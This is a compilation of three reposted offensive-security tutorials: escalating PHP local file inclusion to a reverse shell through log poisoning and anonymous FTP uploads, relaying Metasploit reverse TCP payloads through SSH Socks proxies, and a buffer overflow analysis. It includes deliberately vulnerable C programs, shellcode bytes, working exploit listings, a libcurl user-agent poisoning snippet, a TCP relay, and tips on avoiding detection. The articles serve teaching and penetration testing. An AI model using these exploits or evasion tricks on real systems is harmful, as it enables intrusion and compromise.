  21. From web app LFI to shell spawn Web application LFI (Local File Inclusion) vulnerabilities are regularly underestimated both by penetration testers and developers. Despite the main threat of exposing critical system information contained at core files (such as “/etc/passwd“, “/boot.ini” and “/etc/issue“), LFI vulnerabilities may cause bigger problems to the victim server. Based on the source code that introduces a LFI vulnerability and under certain server configuration scenarios, the attacker may be able to run server side code and establish a reverse connection or a pseudo-shell over HTTP with the victim server. During the rest of the article an LFI vulnerability on a known E-Commerce CMS will be examined in a try to execute server side code and spawn a reverse shell. It is a common feature for web applications to implement file inclusion functionalities in order to dynamically change website’s content presented to users. The arguments to those file inclusion functions are regularly specified by the user under specially crafted parameters. LFI vulnerabilities are created due to improper input sanitization/validation for those user specified parameters. File inclusion functions are implemented using either include (or require) directives or any of the available file handle functions (fread, file_get_contents etc.). In case of file handle functions there aren’t many things to do because every imported file is processed as string. Although if an include directive is used, it is possible to execute server side code contained in the imported file. For more details about PHP import directives, you can referrer to include and require PHP manuals. The real challenge now is to find a way to store server side code into a file that is readable from the web service running user (www-data, wwwrun etc). This is not an easy task and might be even impossible under some server configuration setups. In this article two main methods are examined: 1) Web log poison and 2) World readable file upload (via anonymous FTP). For the article purposes a Debian pwnbox VM has been established implementing a vulnerable version of the osCSS2 E-Commerce CMS. The target web application was a random selection from the exploit-db archive. The vulnerable osCSS2 version and the LFI vulnerability details are available here. The CMS is written in PHP and is served from a running Apache web service. Consequently the following analysis focus on PHP + Apache system setup. 1) Web log poison Web log poison technique is effective when web service’s log files are readable by the user that PHP (or any other server side code) is running. Usually sysadmins choose the performance optimized (and easy to implement) way to run PHP as an Apache module. Consequently PHP is running under Apache user. Usually the default Apache setups limit the access to web logs only to root and administrator users and groups making the logs unaccessible for the web service user. Although, there exist many shared host services and misconfigured systems that serve readable web logs. To confirm that web logs are readable, the target server must be initially enumerated in order to locate the correct paths. In this case study the target system is known to be a Debian setup, so the web log paths are known too. For verification purposes GET requests can be executed to confirm read access. Many of you might wonder at this point why web logs are so important in LFI exploitation. The answer is pretty clear. 
Web logs' content is defined mainly by the user's interaction with the server. Web logs store user information such as source IP, requested web path, referer URL, user agent, cookies etc. Let's take for example the user agent field, which stores information about the user's browser and system. If the attacker changes the default string used by the browsing application to valid PHP code, this code will be stored in the Apache access log. Then, by including the access log through the LFI vulnerability, the PHP code is executed on the server side. In the following example the curl tool is used to poison the logs with PHP code (just calling the phpinfo() function). Instead of curl you can use well-known plugins/addons for your web browser or a third-party proxy tool (such as ZAP or Burp). Knowing now how server-side code can be executed, a PHP system function can be used to call external programs and spawn the reverse shell.

2) File upload via anonymous FTP

During the target enumeration phase, service scanning revealed a running ProFTPD service on port 21 allowing anonymous FTP logins with file upload permissions. By digging into the application's packages and default configurations, pentesters can gather useful information about possible system setups. Following this approach, and with some experimentation, the storage path for the uploaded files can be discovered. For the following case study, the anonymous file upload path is '/home/ftp'. Initially the file containing the PHP code for the reverse connection is uploaded to the target server. After successfully enumerating the path for the anonymous FTP uploads, the 'backdoor.php' file is included, spawning the reverse shell.

The above two methods are a small sample of the available techniques for storing tiny server-side code chunks in readable files on the remote server. After detailed enumeration of the target system, penetration testers can discover various other possible storage points, such as log files from third-party applications. The system and service enumeration process is vital for the attack's success. Penetration testers must carefully search for existing protection directives/configurations (such as the PHP open_basedir config) that might block such an attack.

DISCLAIMER: I'm not responsible for what you do with this info. This information is for educational purposes only.

A. Bechtsoudis

Sursa: https://bechtsoudis.com/hacking/from-web-app-lfi-to-shell-spawn/
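As an illustration of the log-poisoning step described above, here is a minimal C sketch using libcurl that sends a single request whose User-Agent header is a PHP payload, so that the payload ends up in the Apache access log. This is not code from the original article (which uses the curl command-line tool); the URL http://victim.example/ is a placeholder and the whole snippet is only a sketch of the idea.

#include <curl/curl.h>

int main(void)
{
    CURL *curl = curl_easy_init();
    if (!curl)
        return 1;

    /* Placeholder for the vulnerable host. */
    curl_easy_setopt(curl, CURLOPT_URL, "http://victim.example/");
    /* The payload lands verbatim in the User-agent field of the access log. */
    curl_easy_setopt(curl, CURLOPT_USERAGENT, "<?php phpinfo(); ?>");

    CURLcode res = curl_easy_perform(curl);
    curl_easy_cleanup(curl);
    return (res == CURLE_OK) ? 0 : 1;
}

The same effect can be obtained from the shell by setting the User-Agent with curl's -A option, which is essentially what the article does with the command-line tool.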
  22. Using SSH Socks Proxies with MSF Reverse TCP Payloads

Pentesters regularly need to redirect their network traffic through various proxy hosts to access private network subnets, bypass firewall restrictions or hide their traces. Identifying those needs, professionals have armed their tool arsenal with various tunneling and forwarding tools in order to work efficiently under various network architectures and testing cases. Each working case strongly depends on the proxy host's running services and the obtained access level to those services. One of my favorite cases (and, I believe, of many others too) is the OpenSSH Socks proxy scenario. Remote SSH access to the proxy host is available, offering flexible ways to redirect network traffic through the SSH channel. However, there is one main drawback in the Socks proxy case: you "can't" use the available reverse TCP payloads delivered with the Metasploit framework (and any other similar tools). Actually, this is not 100% true. There are some OpenSSH forwarding features that can be used/combined to bypass this restriction.

Many of you might say that there are many alternatives to reverse TCP payloads, such as PHP, Java, HTTP, DNS etc. That's true, although many of them are application-specific and are not fully stable under certain circumstances. Additionally, these alternatives might not always be applicable due to some exploitation restrictions. Others might also say that Metasploit's meterpreter pivot features (framework routes + port forward) can be used to redirect traffic through the proxy host, avoiding Socks usage. The drawback in this case is that if the proxy host is a Linux box, the matching meterpreter payload is not stable enough (at least it wasn't when this post was written). Now that you have been convinced that under certain circumstances the Socks proxy is the only stable option, let's see how we can deal with the reverse TCP restrictions.

When a reverse TCP payload is used, the victim host tries to connect back to the requestor's source IP address. If an SSH Socks proxy is used, the source IP address from the victim's perspective is the proxy's IP address. Consequently, the reverse TCP payload will try to connect back to the proxy and not to the attacker's address. The Metasploit framework identifies this problem and raises an error exception when a Socks proxy is used with a reverse TCP payload. The main concept for bypassing this restriction is to use a forwarding mechanism on the proxy to deliver the network packets to the correct addresses when a reverse connection reaches the proxy.

The presented methods are feasible when the following requirements are met:
- Remote SSH access to the proxy host is available (single user or root; each case is analyzed separately)
- The proxy host has at least one unused incoming port (from the victim) allowed by the firewall
- The proxy host can access the target host

For the rest of the article the following network topology will be used for the examined cases:

Initially let's establish the SSH Socks proxy with the pivot host and test the Socks proxy connectivity via the proxychains tool:

The SSH Socks proxy works and we can use it to access the victim host:

Now if we try to use the Socks proxy with a reverse TCP payload, Metasploit raises an exception:

OpenSSH port forwarding features can help us to bypass this restriction.
Two cases will be examined according to the access level that the attacker has on the proxy host:
- Root access: modify the OpenSSH configuration and use the remote port forwarding feature
- Single user access: use the OpenSSH local port forwarding mechanism by establishing a second SSH channel

For those not familiar with the local & remote SSH port forwarding features, you can refer to the references at the end. Before continuing, let's disable Metasploit's reverse TCP Socks proxy check in order to confirm both test cases under the framework. Luckily for us, the framework's modular architecture makes such code hacks easy to implement. So just comment out lines 68-70 in "lib/msf/core/handler/reverse_tcp.rb".

1. Root Access to Proxy Host

The OpenSSH remote port forwarding feature is used to redirect incoming traffic on port 4444 of the proxy host to port 53 on the attacker. As the OpenSSH manual mentions, by default remote port forwarding binds the proxy port (4444 in our case) to the localhost address. Binding to localhost would block incoming connections from the victim, so we need root access to modify the sshd configuration and enable the GatewayPorts option. When the payload is triggered the network paths are as follows:

Before proceeding to the framework usage, let's check with a simple netcat connection that the setup works:

If instead of the attacker's IP address you use the localhost address, the forward channel will work like a charm (actually this is the correct approach), although Metasploit's session manager will fail to identify the connection and will crash. Some tcpdump debugging might help at this point to clarify how these forwarders and port binds work. Having confirmed that our proxy forwarder works, let's proceed to the framework. A Linux x86 staged reverse TCP shell payload has been generated and uploaded to the victim host. To trigger the payload a corresponding PHP script has been placed in the web path. The tricky part while generating the payload is to use as LHOST the proxy's IP address and as LPORT the port (4444 in this example) that is forwarded to the attacker by the proxy. Finally let's trigger the payload via a custom auxiliary module (a single GET request) and establish the reverse connection through the Socks proxy:

2. Single User Access to Proxy Host

Single user access to the proxy host means that we can't set the GatewayPorts option in the sshd configuration. So we need to find an alternative way to implement the forwarder. This time the OpenSSH local port forwarding feature (-L) is used over a second SSH connection to localhost on the proxy host. The -g flag is used to bind the socket on 0.0.0.0, allowing incoming connections from hosts other than localhost. Consequently the reverse connection path is as follows:

The usual netcat tests before proceeding to the framework:

And finally the Socks proxy is also successfully working with reverse TCP payloads under the framework:

Mission accomplished! We have managed to use reverse TCP payloads under SSH Socks proxies by taking advantage of the various OpenSSH features. Of course someone might implement the port forwarding on the proxy host in various other ways (iptables, third-party tools etc). The OpenSSH way was chosen because it is already available in the SSH Socks proxy scenario and regularly passes undetected by the sysadmins, while a third-party tool might trigger some alerts (of course iptables isn't feasible in the single user access case).
It would be ideal if the above concept could somehow be implemented in the Metasploit framework, making reverse TCP payloads available under certain Socks proxy scenarios.

References:
LiNUX Horizon - SSH Port Forwarding (SSH Tunneling)
Howto use SSH local and remote port forwarding
http://www.metasploit.com
Metasploit: Metasploit through Proxy
Meterpreter Basics - Metasploit Unleashed
Pivoting - Metasploit Unleashed

—{ Update 11 June 2012 }—
The proxy's port forwarding back to the attacker can also be easily implemented with netcat. Be careful while using the netcat approach, as its plaintext connections might trigger IDS/IPS rulesets. For stealthier communications try to establish an encrypted channel with the proxy (ncat, netcat + stunnel etc).

A. Bechtsoudis

Sursa: https://bechtsoudis.com/hacking/using-ssh-socks-proxies-with-msf-reverse-tcp-payloads/
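To make the forwarding mechanics concrete, here is a minimal single-connection TCP relay written in C. It is roughly what the ssh -R / -L forwarders (or the netcat trick from the update above) provide, stripped of encryption: listen on one port, accept the victim's reverse connection, connect out to the attacker and shuttle bytes in both directions. This is only a sketch under POSIX sockets, not code from the article; the ports and addresses are command-line arguments you would substitute for the 4444/53 values used above.

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <listen_port> <dst_ip> <dst_port>\n", argv[0]);
        return 1;
    }

    /* Listening socket bound on 0.0.0.0, like "ssh -g" does. */
    int lsock = socket(AF_INET, SOCK_STREAM, 0);
    int one = 1;
    setsockopt(lsock, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    struct sockaddr_in laddr = {0};
    laddr.sin_family = AF_INET;
    laddr.sin_addr.s_addr = INADDR_ANY;
    laddr.sin_port = htons((unsigned short)atoi(argv[1]));
    if (bind(lsock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0 || listen(lsock, 1) < 0) {
        perror("bind/listen");
        return 1;
    }

    /* Wait for the single reverse connection coming from the victim. */
    int vsock = accept(lsock, NULL, NULL);
    if (vsock < 0) { perror("accept"); return 1; }

    /* Connect out to the final destination (the attacker's handler). */
    int asock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in aaddr = {0};
    aaddr.sin_family = AF_INET;
    aaddr.sin_port = htons((unsigned short)atoi(argv[3]));
    inet_pton(AF_INET, argv[2], &aaddr.sin_addr);
    if (connect(asock, (struct sockaddr *)&aaddr, sizeof(aaddr)) < 0) {
        perror("connect");
        return 1;
    }

    /* Relay traffic in both directions until either side closes. */
    char buf[4096];
    for (;;) {
        fd_set rfds;
        FD_ZERO(&rfds);
        FD_SET(vsock, &rfds);
        FD_SET(asock, &rfds);
        int maxfd = (vsock > asock ? vsock : asock) + 1;
        if (select(maxfd, &rfds, NULL, NULL, NULL) < 0)
            break;
        if (FD_ISSET(vsock, &rfds)) {
            ssize_t n = read(vsock, buf, sizeof(buf));
            if (n <= 0 || write(asock, buf, (size_t)n) != n)
                break;
        }
        if (FD_ISSET(asock, &rfds)) {
            ssize_t n = read(asock, buf, sizeof(buf));
            if (n <= 0 || write(vsock, buf, (size_t)n) != n)
                break;
        }
    }
    close(vsock);
    close(asock);
    close(lsock);
    return 0;
}

Running something like ./relay 4444 <attacker_ip> 53 on the proxy reproduces the victim -> proxy:4444 -> attacker:53 path described in the root-access case, only without the SSH layer.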
  23. [h=1]Analysis of Buffer Overflow Attacks[/h][h=1]by Maciej Ogorkiewicz & Piotr Frej [Published on 8 Nov. 2002 / Last Updated on 23 Jan. 2013][/h]

What causes the buffer overflow condition? Broadly speaking, a buffer overflow occurs any time the program writes more information into the buffer than the space it has allocated in memory. This allows an attacker to overwrite data that controls the program execution path and hijack control of the program to execute the attacker's code instead of the process code. For those who are curious to see how this works, we will now attempt to examine in more detail the mechanism of this attack and also to outline certain preventive measures.

From experience we know that many have heard about these attacks, but few really understand the mechanics of them. Others have a vague idea or none at all of what a buffer overflow attack is. There are also those who consider this problem to fall under a category of secret wisdom and skills available only to a narrow segment of specialists. However, this is nothing more than a vulnerability problem brought about by careless programmers. Programs written in the C language, where more focus is given to programming efficiency and code length than to the security aspect, are the most susceptible to this type of attack. In fact, in programming terms, the C language is considered to be very flexible and powerful, but it seems that although this tool is an asset it may become a headache for many novice programmers. It is enough to mention its pointer-based direct memory access or its approach to text strings. The latter implies that even among library functions working on text strings there are those that cannot control the length of the real buffer, thereby becoming susceptible to an overflow of the declared length. Before attempting any further analysis of the mechanism by which the attack progresses, let us develop a familiarity with some technical aspects regarding program execution and memory management.

[h=2]Process Memory[/h]

When a program is executed, its various compilation units are mapped in memory in a well-structured manner. Fig. 1 represents the memory layout.

Fig. 1: Memory arrangement

Legend: The text segment contains primarily the program code, i.e., a series of executable program instructions. The next segment is an area of memory containing both initialized and uninitialized global data. Its size is provided at compilation time. Going further into the memory structure toward higher addresses, we have a portion shared by the stack and heap that, in turn, are allocated at run time. The stack is used to store function call arguments, local variables and the values of selected registers, allowing the program state to be retrieved. The heap holds dynamic variables. To allocate memory, the heap uses the malloc function or the new operator.

[h=2]What is the stack used for?[/h]

The stack works according to a LIFO model (Last In First Out).
Since the spaces within the stack are allocated for the lifetime of a function, only data that is active during this lifetime can reside there. This type of structure results from the essence of the structural approach to programming, where the code is split into many code sections called functions or procedures. When a program runs in memory, it sequentially calls each individual procedure, very often calling one from another, thereby producing a multi-level chain of calls. Upon completion of a procedure, the program is required to continue execution by processing the instruction immediately following the CALL instruction. In addition, because the calling function has not been terminated, all its local variables, parameters and execution status need to be "frozen" to allow the remainder of the program to resume execution immediately after the call. The implementation of a stack guarantees exactly this behavior.

[h=2]Function calls[/h]

The program works by sequentially executing CPU instructions. For this purpose the CPU has the Extended Instruction Pointer (the EIP register) to maintain the sequence order. It controls the execution of the program, indicating the address of the next instruction to be executed. For example, running a jump or calling a function causes said register to be appropriately modified. Suppose that the program calls a function located somewhere else in its code section and proceeds with execution there. What will happen then? When a procedure is called, the return address for the function call, which the program needs to resume execution, is put on the stack. Looking at it from the attacker's point of view, this is a situation of key importance. If the attacker somehow managed to overwrite the return address stored on the stack, upon termination of the procedure it would be loaded into the EIP register, potentially allowing any overflow code to be executed instead of the process code resulting from the normal behavior of the program. We may see how the stack behaves after the code of Listing 1 has been executed.

Listing 1

void f(int a, int b)
{
char buf[10]; // <-- the stack is watched here
}

void main()
{
f(1, 2);
}

After the function f() is entered, the stack looks like the illustration in Figure 2.

Fig. 2 Behavior of the stack during execution of the code from Listing 1

Legend: Firstly, the function arguments are pushed backwards onto the stack (in accordance with the C language calling rules), followed by the return address. From now on, the function f() executes: it pushes the current EBP content (EBP will be discussed further below) and then allocates a portion of the stack for its local variables. Two things are worth noticing. Firstly, the stack grows downwards in memory as it gets bigger. This is important to remember, because a statement like this:

sub esp, 08h

which causes the stack to grow, may seem confusing. In fact, the bigger the ESP, the smaller the stack size and vice versa. An apparent paradox. Secondly, whole 32-bit words are pushed onto the stack. Hence, a 10-character array really occupies three full words, i.e. 12 bytes.

[h=2]How does the stack operate?[/h]

There are two CPU registers that are of "vital" importance for the functioning of the stack; they hold the information that is necessary when accessing data residing in memory. Their names are ESP and EBP. The ESP (Stack Pointer) holds the top stack address. ESP is modifiable and can be modified either directly or indirectly.
Directly – direct operations are possible here, for example add esp, 08h. This shrinks the stack by 8 bytes (2 words).

Indirectly – by adding/removing data elements to/from the stack with each successive PUSH or POP stack operation.

The EBP register is a basic (static) register that points to the stack bottom. More precisely, it contains the address of the bottom of the stack frame of the currently executed procedure. Each time a new procedure is called, the old value of EBP is the first to be pushed onto the stack and then the current value of ESP is moved into EBP. This value of ESP held by EBP becomes the reference base for the local variables that are needed to retrieve the stack section allocated for the function call {1}. Since ESP points to the top of the stack, it gets changed frequently during the execution of a program, and having it as an offset reference register is very cumbersome. That is why EBP is employed in this role.

[h=2]The threat[/h]

How do we recognize where an attack may occur? We know that the return address is stored on the stack. Also, data is handled on the stack. Later we will see what can happen to the return address when, under certain circumstances, these two facts are combined. With this in mind, let us try this simple application example using Listing 2.

Listing 2

#include <string.h>

char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes

void main()
{
char buf[8];
strcpy(buf, code);
}

When executed, the above application returns an access violation {2}. Why? Because an attempt was made to fit a 16-character string into an 8-byte space (this is quite possible since no bounds checking is carried out). Thus, the allocated memory space has been exceeded and the data at the stack bottom is overwritten. Let us look once again at Figure 2. Critical data such as the frame address and the return address get overwritten (!). Therefore, upon returning from the function, a modified return address is loaded into EIP, thereby making the program proceed at the address pointed to by this value, thus creating the execution error. So, corrupting the return address on the stack is not only feasible, but also trivial when "enhanced" by programming errors. Poor programming practices and buggy software provide a huge opportunity for a potential attacker to execute malicious code of his own design.

[h=2]Stack overrun[/h]

We must now put all this information together. As we already know, the program uses the EIP register to control execution. We also know that upon calling a function, the address of the instruction immediately following the call instruction is pushed onto the stack, and then popped from there and moved into EIP when a return is performed. We may ascertain that the saved EIP can be modified while it sits on the stack, by overwriting the buffer in a controlled manner. Thus, an attacker has all the information needed to point execution at his own code and get it executed, creating a thread in the victim process. Roughly, the algorithm to effectively overrun the buffer is as follows:

1. Discovering code which is vulnerable to a buffer overflow.
2. Determining the number of bytes needed to overwrite the return address.
3. Calculating the address at which to point the alternate code.
4. Writing the code to be executed.
5. Linking everything together and testing.

The following Listing 3 is an example of a victim's code.
Listing 3 – The victim's code

#include <stdio.h>
#include <string.h>

#define BUF_LEN 40

void main(int argc, char **argv)
{
char buf[BUF_LEN];
if (argc > 1)
{
printf("\nbuffer length: %d\nparameter length: %d", BUF_LEN, strlen(argv[1]) );
strcpy(buf, argv[1]);
}
}

This sample code has all the characteristics that indicate a potential buffer overflow vulnerability: a local buffer and an unsafe function that writes the value of the first command line parameter to memory with no bounds checking employed. Putting our newfound knowledge to use, let us accomplish a sample hacker's task. As we ascertained earlier, spotting a code section potentially vulnerable to buffer overflow seems simple. The use of the source code (if available) may be helpful; otherwise we can just look for something critical in the program to overwrite. The first approach focuses on searching for string-based functions like strcpy(), strcat() or gets(). Their common feature is that they perform unbounded copy operations, i.e. they copy as many bytes as possible until a NULL byte (code 0) is found. If, in addition, these functions operate on a local buffer and there is the possibility to redirect the process execution flow to anywhere we want, we will be successful in accomplishing an attack. Another approach would be trial and error, relying on stuffing an excessively large batch of data into any available space. Consider now the following example:

victim.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

If the program returns an access violation error, we may simply move on to step 2. The problem now is to construct a large string with overflow potential to effectively overwrite the return address. This step is also very easy. Remembering that only whole words can be pushed onto the stack, we simply need to construct the following string:

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU.............

If successful, in terms of potential buffer overflow, this string will cause the program to fail with the well-known error message:

The instruction at "0x4b4b4b4b" referenced memory at "0x4b4b4b4b". The memory could not be "read"

The only conclusion to be drawn is that since the value 0x4b is the capital letter "K" in ASCII code, the return address has been overwritten with "KKKK". Therefore, we can proceed to step 3. Finding the address of the beginning of the buffer in memory (and of the injected shellcode) will not be easy. Several methods can be used to make this "guessing" more efficient, one of which we will discuss now, while the others will be explained later. In the meanwhile we need to get the necessary address by simply tracing the code. After starting the debugger and loading the victim program, we will attempt to proceed. The initial concern is to get through a series of system function calls that are irrelevant from this task's point of view. A good method is to trace the stack at runtime until the input string characters appear successively. Perhaps two or more attempts will be required to find code similar to that provided below:

:00401045 8A08 mov cl, byte ptr [eax]
:00401047 880C02 mov byte ptr [edx+eax], cl
:0040104A 40 inc eax
:0040104B 84C9 test cl, cl
:0040104D 75F6 jne 00401045

This is the strcpy function we are looking for. On entry to the function, the memory location pointed to by EAX is read in order to move (next line) its value into the memory location pointed to by the sum of the registers EAX and EDX.
By reading the contents of these registers during the first iteration we can determine that the buffer is located at 0x0012fec0. Writing shellcode is an art in itself. Since operating systems use different system function calls, an individual approach is needed, depending on the OS environment under which the code must run and the goal it is aimed at. In the simplest case, nothing needs to be done, since just overwriting the return address causes the program to deviate from its expected behavior and fail. In fact, because buffer overflow flaws let the attacker execute arbitrary code, it is possible to carry out a range of different activities constrained only by the available space (although this problem can also be circumvented) and access privileges. In most cases, a buffer overflow is a way for an attacker to gain "super user" privileges on the system or to use a vulnerable system to launch a Denial of Service attack. Let us try, for example, to create a shellcode that runs the command interpreter (cmd.exe in WinNT/2000). This can be attained by using the standard API functions WinExec or CreateProcess. When WinExec is called, the call will look like this:

WinExec(command, state)

In terms of the activities that are necessary from our point of view, the following steps must be carried out:
- pushing the command to run onto the stack. It will be "cmd /c calc".
- pushing the second parameter of WinExec onto the stack. We assume it to be zero in this script.
- pushing the address of the command "cmd /c calc".
- calling WinExec.

There are many ways to accomplish this task and the snippet below is only one of the possible tricks:

sub esp, 28h ; 3 bytes
jmp calling ; 2 bytes
par: call WinExec ; 5 bytes
push eax ; 1 byte
call ExitProcess ; 5 bytes
calling: xor eax, eax ; 2 bytes
push eax ; 1 byte
call par ; 5 bytes
.string cmd /c calc|| ; 13 bytes

Some comments on this:

sub esp, 28h

This instruction adds some room to the stack. Since the procedure containing the overflowed buffer has completed, the stack space allocated for its local variables is now considered unused due to the change in ESP. This has the effect that any function call made from the code level is likely to overwrite our arduously constructed code inserted in the buffer. To keep it safe, all we need is to move the stack pointer back below our data, that is, by its original value (40 bytes), thereby assuring that our data will not be overwritten.

jmp calling

The next instruction jumps to the location where the WinExec function arguments are pushed onto the stack. Some attention must be paid to this. Firstly, a NULL value has to be "elaborated" and placed onto the stack. Such a function argument cannot be taken directly from the code, otherwise it would be interpreted as the NULL terminating the string, and the string would only be partially copied. In the next step, we need a way of obtaining the address of the command to run, and we will do this in a somewhat ad hoc manner. As we may remember, each time a function is called, the address following the call instruction is placed onto the stack. This is the trick used here: the call par instruction is placed immediately before the command string, so the address pushed onto the stack is the address of that string — exactly the parameter WinExec needs. (Our exploit will, of course, first have overwritten the saved return address so that this code gets executed at all.) Subsequently, WinExec followed by ExitProcess will be run.
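For reference, the job this hand-written shellcode performs is the same as the following ordinary C fragment — a plain WinExec of the command followed by ExitProcess. It is shown only for clarity (compiled C obviously cannot be injected as-is); the second parameter is 0, matching the zero the shellcode pushes as the display mode.

#include <windows.h>

int main(void)
{
    /* What the shellcode does: run the command, then terminate the
     * (hijacked) process so it does not crash noisily afterwards. */
    WinExec("cmd /c calc", 0);
    ExitProcess(0);
}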
As we already know, a CALL is encoded as an offset relative to the instruction that follows it, and now we need to compute this offset. Fig. 3 below shows the structure of a shellcode that accomplishes this task.

Fig. 3 A sample shellcode

Legend: As can be seen, our example does not take care of our reference point, EBP, which would normally need to be pushed onto the stack. This is due to the assumption that the victim program is VC++ 7 compiled code with its default settings, which skip that operation. The remaining job is to put the code pieces together and test the whole. The above shellcode, incorporated into a C program in a form more suitable for the CPU, is presented in Listing 4.

Listing 4 – Exploit of the program victim.exe

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char *victim = "victim.exe";
char *code = "\x90\x90\x90\x83\xec\x28\xeb\x0b\xe8\xe2\xa8\xd6\x77\x50\xe8\xc1\x90\xd6\x77\x33\xc0\x50\xe8\xed\xff\xff\xff";
char *oper = "cmd /c calc||";
char *rets = "\xc0\xfe\x12";
char par[64]; /* room for code + command + return address */

void main()
{
strncat(par, code, 28);
strncat(par, oper, 14);
strncat(par, rets, 4);
char *buf;
buf = (char*)malloc( strlen(victim) + strlen(par) + 4);
if (!buf)
{
printf("Error malloc");
return;
}
wsprintf(buf, "%s \"%s\"", victim, par);
printf("Calling: %s", buf);
WinExec(buf, 0);
}

Ooops, it works! The only requirement is that the current directory contains a compiled victim.exe from Listing 3. If all goes as expected, we will see a window with the well-known System Calculator.

[h=2]Stack-based and non-stack-based exploits[/h]

In the previous example we presented our own code that is executed once control over the program has been taken. However, such an approach may not be applicable when a "victim" is able to check that no illegal code is executed on the stack, otherwise the program will be stopped. Increasingly, so-called non-stack-based exploits are being used. The idea is to call a system function directly by overwriting (nothing new!) the return address with, for example, the address of WinExec. The only remaining problem is to push the parameters used by the function onto the stack in a usable state. So, the exploit structure will be like in Figure 4.

Fig. 4 A non-stack based exploit

Legend: A non-stack-based exploit requires no instructions in the buffer, only the calling parameters of the function WinExec. Because a command terminated with a NULL character cannot be handled, we will use the characters '||'. They are used to link multiple commands in a single command line; each successive command will be executed only if the execution of the previous command has failed. This step is indispensable for terminating the command to run without executing the padding. Next to the padding, which is only used to fill the buffer, we place the return address (ret) to overwrite the saved return address with that of WinExec. Furthermore, a dummy return address (r) placed after it ensures a suitable stack layout. Since the WinExec function accepts any DWORD value as the display mode, it is possible to let it use whatever is currently on the stack. Thus, only one of the two parameters remains to be supplied. In order to test this approach, it is necessary to have the victim's program. It will be very similar to the previous one but with a buffer which is considerably larger (why? We will explain later). This program is called victim2.exe and is presented as Listing 5.
Listing 5 – A victim of a non-stack based exploit attack

#include <stdio.h>
#include <string.h>

#define BUF_LEN 1024

void main(int argc, char **argv)
{
char buf[BUF_LEN];
if (argc > 1)
{
printf("\nBuffer length: %d\nParameter length: %d", BUF_LEN, strlen(argv[1]) );
strcpy(buf, argv[1]);
}
}

To exploit this program we need the piece given in Listing 6.

Listing 6 – Exploit of the program victim2.exe

#include <windows.h>

char* code = "victim2.exe \"cmd /c calc||AAAAA...AAAAA\xaf\xa7\xe9\x77\x90\x90\x90\x90\xe8\xfa\x12\"";

void main()
{
WinExec( code, 0 );
}

For simplicity's sake, a portion of the "A" characters inside the string has been deleted. The sum of all characters in our program should be 1011. When the WinExec function returns, the program makes a jump to the dummy saved return address and will consequently quit working. It will then report a function call error, but by that time the command should already be performing its purpose. Given this buffer size, one may ask why it is so large whereas the "malicious" code has become relatively small. Notice that with this procedure we overwrite the return address used upon termination of the task. This implies that when the function returns, the stack pointer is restored to its original value, leaving the space below it free for the local variables of subsequent calls. This, in turn, causes the space holding our code (a local buffer, in fact) to become room for a sequence of procedures. The latter can use the allocated space in an arbitrary manner, most likely by overwriting the saved data. This means that there is no way to move the stack pointer manually, as we cannot execute any code of our own from there. For example, the function WinExec, which is called right at the beginning of the process, occupies 84 bytes of the stack and calls subsequent functions that also place their data onto the stack. We need to have such a large buffer to prevent our data from being destroyed. Figure 5 illustrates this methodology.

Fig. 5 A sample non-stack based exploit: stack usage

Legend: This is just one of many possible solutions, with many alternatives to consider. First of all, it is easy to implement because it is not necessary to create our own shellcode. It is also immune to protections that use monitoring libraries to capture illegal code on the stack.

[h=2]System function calling[/h]

Notice that all previously discussed system function calls employ a jump to a pre-determined, fixed address in memory. This determines the static behavior of the code, which implies that we accept our code being non-transferable across various Windows operating environments. Why? Our intention is to point out a problem associated with the fact that various Windows OSes use different user and kernel addresses. Therefore, the kernel base address differs and so do the system function addresses. For details, see Table 1.

Table 1. Kernel addresses vs. OS environment

Windows Platform | Kernel Base Address
Win95 | 0xBFF70000
Win98 | 0xBFF70000
WinME | 0xBFF60000
WinNT (Service Pack 4 and 5) | 0x77F00000
Win2000 | 0x77F00000

To prove it, simply run our example under an operating system other than Windows NT/2000/XP. What remedy would be appropriate?
The key is to dynamically fetch the function addresses, at the cost of a considerable increase in code length. It turns out that it is sufficient to find where two useful system functions are located, namely GetProcAddress and LoadLibraryA, and use them to get any other function address returned. For more details, see the references, particularly the Kungfoo project developed by Harmony [6].

[h=2]Other ways of defining the beginning of the buffer[/h]

All previously mentioned examples used a debugger to establish the beginning of the buffer. The problem lies in the fact that we wanted to establish this address very precisely. Generally, this is not strictly necessary. If the alternate code is placed somewhere in the middle of the buffer rather than at its very beginning, and the space after the code is filled with many copies of the jump address, the return address will surely be overwritten as required. If, in addition, we fill the buffer up to the beginning of the code with a series of 0x90 bytes, our chance of guessing a working return address grows considerably. So, the buffer will be filled as illustrated in Figure 6.

Fig. 6 Using NOPs during an overflow attack

Legend: The 0x90 opcode corresponds to a NOP instruction that does literally nothing; a long run of them forms a NOP slide. If the overwritten return address points at any of the NOPs, the program will slide through them and consequently reach the beginning of the shellcode. This is the trick that avoids a cumbersome search for the precise address of the beginning of the buffer.

[h=2]Where does the risk lie?[/h]

Poor programming practices and software bugs are undoubtedly a risk factor. Typically, the risk lies in programs that use text string functions, which lack any automatic bounds checking. The standard C/C++ libraries are filled with such dangerous functions. These include: strcpy(), strcat(), sprintf(), gets(), scanf(). If their target string is a fixed-size buffer, a buffer overflow can occur when reading input from the user into such a buffer. Another commonly encountered pattern is using a loop to copy single characters from either the user or a file. If the loop's exit condition depends on the occurrence of a particular character, the situation is the same as above.

[h=2]Preventing buffer overflow attacks[/h]

The most straightforward and effective solution to the buffer overflow problem is to employ secure coding. On the market there are several commercial or free solutions available which effectively stop most buffer overflow attacks. Two approaches are commonly employed here:

- library-based defenses that use re-implemented unsafe functions and ensure that these functions can never write past the buffer size. An example is the Libsafe project.
- library-based defenses that detect any attempt to run illegitimate code on the stack. If a stack smashing attack has been attempted, the program responds by emitting an alert. This is the solution implemented in SecureStack, developed by SecureWave.

